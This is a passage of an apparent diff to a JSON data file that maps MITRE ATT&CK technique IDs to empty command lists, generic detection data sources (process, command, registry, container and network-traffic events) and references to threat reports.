interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1328", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + ] + }, + { + "technique_id": "T1346", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + ] + }, + { + "technique_id": "T1345", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + { + "technique_id": 
"T1313", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + { + "technique_id": "T1326", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + ] + }, + { + "technique_id": "T1330", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + ] + }, + { + "technique_id": "T1333", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + ] + }, + { + "technique_id": "T1311", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html" + ] + }, + { + "technique_id": "T1329", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html" + ] + }, + { + "technique_id": "T1331", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + 
"https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf" + ] + }, + { + "technique_id": "T1351", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + ] + }, + { + "technique_id": "T1307", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + ] + }, + { + "technique_id": "T1497", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process 
was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": 
"os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1488", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [], + "external_reference": [ + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + ] + }, + { + "technique_id": "T1553.006", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by 
applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about 
instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1614", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance metadata", + "description": "Data and 
information that describe an instance and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "instance" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": 
"user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + 
"https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1613", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "cluster", + "definition": "Information about a cluster within a containerized environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "cluster metadata", + "description": "Data and information that describe a cluster and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "cluster" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container enumeration", + "description": "Containers were listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "containers" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container metadata", + "description": "Data and information that describe a container and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "container" + }, + { + "data_source": "pod", + "definition": "Information about a pod within a containerized environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "pod enumeration", + "description": "Pods were listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "pods" + }, + { + "data_source": "pod", + "definition": 
"Information about a pod within a containerized environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "pod metadata", + "description": "Data and information that describe a pod and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "pod" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://kubernetes.io/docs/concepts/cluster-administration/", + "https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cluster-info" + ], + [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + [ + "https://kubernetes.io/docs/reference/kubectl/kubectl/", + "https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/#pod-v1-core" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1612", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image creation", + "description": "An image was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "image" + }, + { + "data_source": "network traffic", 
+ "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
